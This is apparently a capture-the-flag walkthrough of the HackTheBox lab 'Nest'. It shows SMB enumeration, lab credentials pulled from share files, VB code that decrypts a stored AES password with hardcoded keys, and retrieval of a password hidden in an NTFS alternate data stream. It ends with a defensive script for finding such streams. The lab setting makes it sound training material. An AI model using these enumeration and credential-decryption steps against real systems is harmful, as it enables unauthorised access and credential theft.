# NEST

~~~
nmap -sS --min-rate 5000 -p- 10.10.10.178 -oG allPorts
~~~

![](https://i.imgur.com/LjgOXX4.png)

~~~
smbmap -H 10.10.10.178 -u ''
smbmap -H 10.10.10.178 -u 'null'
smbmap -H 10.10.10.178 -u 'cualquiercosa'
~~~

![](https://i.imgur.com/4qI1iFm.png)

~~~
smbclient -L \\\\10.10.10.178\\ -N
~~~

![](https://i.imgur.com/izVIYzH.png)
![](https://i.imgur.com/bZtoLS0.png)

~~~
smbclient \\\\10.10.10.178\\Data -N
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
~~~

![](https://i.imgur.com/G2KVWe2.png)
![](https://i.imgur.com/KiBb7Nq.png)

~~~
Username: TempUser
Password: welcome2019
~~~

~~~
crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019'
~~~

![](https://i.imgur.com/hg30pS1.png)

~~~
smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178
~~~

![](https://i.imgur.com/kw7oixf.png)

~~~
smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178 -R
~~~

![](https://i.imgur.com/oVQpSTJ.png)

~~~
smbmap -u 'TempUser' -p 'welcome2019' -H 10.10.10.178 -R 'Users\'
~~~

![](https://i.imgur.com/Xsj4Lqb.png)

~~~
smbclient \\\\10.10.10.178\\Data -U 'TempUser'
smbclient \\\\10.10.10.178\\Data -U 'TempUser%welcome2019'
smbclient \\\\10.10.10.178\\Data -U 'TempUser'%'welcome2019'
~~~

![](https://i.imgur.com/xNtIqj5.png)

~~~
telnet 10.10.10.178 4386
>HELP
>SETDIR /
~~~

![](https://i.imgur.com/F7sSgrh.png)

~~~
>LIST
~~~

![](https://i.imgur.com/44xBCbB.png)

~~~
mount -t cifs //10.10.10.178/Data /mnt/smbMounted/ -o "username=TempUser,password=welcome2019"
umount /mnt/smbMounted
~~~

~~~
tree -fas
~~~

![](https://i.imgur.com/HMd1VxK.png)

~~~
cat ./IT/Configs/NotepadPlusPlus/config.xm
~~~

![](https://i.imgur.com/e0WJSp7.png)

~~~
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
~~~

~~~
cat ."/IT/Configs/RU Scanner/RU_config.xml"
~~~

![](https://i.imgur.com/1SlZbMZ.png)

~~~
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
~~~

~~~
mount -t cifs //10.10.10.178/Secure$ /mnt/smbMounted/ -o "username=TempUser,password=welcome2019"
~~~

![](https://i.imgur.com/6wu73LV.png)

Keep in mind that even when we cannot list some resources, at the permission level we may still have access to some of them:

![](https://i.imgur.com/ocG2dEy.png)

~~~
tree -fas
~~~

![](https://i.imgur.com/TMI6JAG.png)

~~~
ls -l
~~~

![](https://i.imgur.com/FJD619v.png)

~~~
cat Module1.vb
~~~

![](https://i.imgur.com/bpGOvOd.png)

~~~
cat SsIntegration.vb
~~~

![](https://i.imgur.com/U5K75ua.png)

~~~
cat Utils.vb
~~~

![](https://i.imgur.com/fTiLrdA.png)

https://dotnetfiddle.net/ can be used to compile VB code online:

![](https://i.imgur.com/n6kxF8X.png)

Code used:

~~~
Imports System.Text
Imports System.Security.Cryptography
Imports System

Public Class Utils

    ' Passphrase, salt, iteration count, IV and key size are hardcoded in the source.
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        ' PBKDF2 key derivation from the passphrase and salt
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        ' Same PBKDF2 derivation as Encrypt, so the same key is obtained
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        ' Print the recovered plaintext
        System.Console.WriteLine(plainText)
        Return plainText
    End Function

    Public Class SsoIntegration
        Public Property Username As String
        Public Property Password As String
    End Class

    ' Shared so that it is a valid entry point when declared inside a class
    Public Shared Sub Main()
        Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub

End Class
~~~

![](https://i.imgur.com/qMQWJRr.png)

~~~
xRxRxPANCAK3SxRxRx
~~~

~~~
crackmapexec smb 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx'
~~~

![](https://i.imgur.com/meyIqZ4.png)

~~~
smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' -r 'Users'
smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' -r 'Users/C.Smith'
~~~

![](https://i.imgur.com/OgUk9Qn.png)

~~~
smbmap -H 10.10.10.178 -u 'c.smith' -p 'xRxRxPANCAK3SxRxRx' --download 'Users/C.Smith/user.txt'
~~~

![](https://i.imgur.com/eQy6gyJ.png)

~~~
mount -t cifs //10.10.10.178/Users /mnt/smbMounted/ -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
~~~

![](https://i.imgur.com/tm1WdNn.png)
![](https://i.imgur.com/b8Qcp1I.png)

~~~
cat Debug\ Mode\ Password.txt
~~~

![](https://i.imgur.com/BPQw563.png)

On Windows machines there is a concept to keep in mind: ADS (Alternate Data Streams).

~~~
smbclient \\\\10.10.10.178\\Users -U 'c.smith'%'xRxRxPANCAK3SxRxRx'
cd "C.Smith\HQK Reporting\"
get "Debug Mode Password.txt:Password"
~~~

![](https://i.imgur.com/Lx958fu.png)
![](https://i.imgur.com/BPOqsI0.png)

~~~
allinfo "Debug Mode Password.txt"
~~~

![](https://i.imgur.com/tq1xSuC.png)
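
The `allinfo` output is where alternate data streams become visible, so it is also what you parse when auditing a share for data stored outside the default stream. The script below is an added example, not part of the original write-up: `list_named_streams` and `sample_allinfo` are names chosen here, and the sample text is constructed (timestamps and sizes are made up) in the layout smbclient prints.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit smbclient `allinfo`
# output for named alternate data streams.

# Reads `allinfo` text on stdin and prints "<stream name><TAB><size in bytes>"
# for every stream except the unnamed default one ([::$DATA], the file body).
list_named_streams() {
    awk '
        /^stream: \[/ {
            line = $0
            sub(/^stream: \[/, "", line)   # ":Password:$DATA], 21 bytes"
            name = line
            sub(/\].*$/, "", name)         # ":Password:$DATA"
            size = line
            sub(/^.*\], */, "", size)      # "21 bytes"
            sub(/ bytes.*$/, "", size)     # "21"
            if (name == "::$DATA") next    # default stream, nothing hidden
            sub(/^:/, "", name)            # "Password:$DATA"
            sub(/:\$DATA$/, "", name)      # "Password"
            printf "%s\t%s\n", name, size
        }
    '
}

# Constructed sample in the layout smbclient prints for `allinfo`;
# timestamps and sizes are made up for the example.
sample_allinfo() {
    cat <<'EOF'
altname: DEBUGM~1.TXT
create_time:    Wed Jan  1 10:00:00 AM 2020 UTC
access_time:    Wed Jan  1 10:00:00 AM 2020 UTC
write_time:     Wed Jan  1 10:00:00 AM 2020 UTC
change_time:    Wed Jan  1 10:00:00 AM 2020 UTC
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 21 bytes
EOF
}

sample_allinfo | list_named_streams
```

A file whose default stream is 0 bytes while a named stream holds data, as in the sample, is the pattern worth flagging: tools that only read the default stream (`cat` on a CIFS mount, for instance) show it as empty.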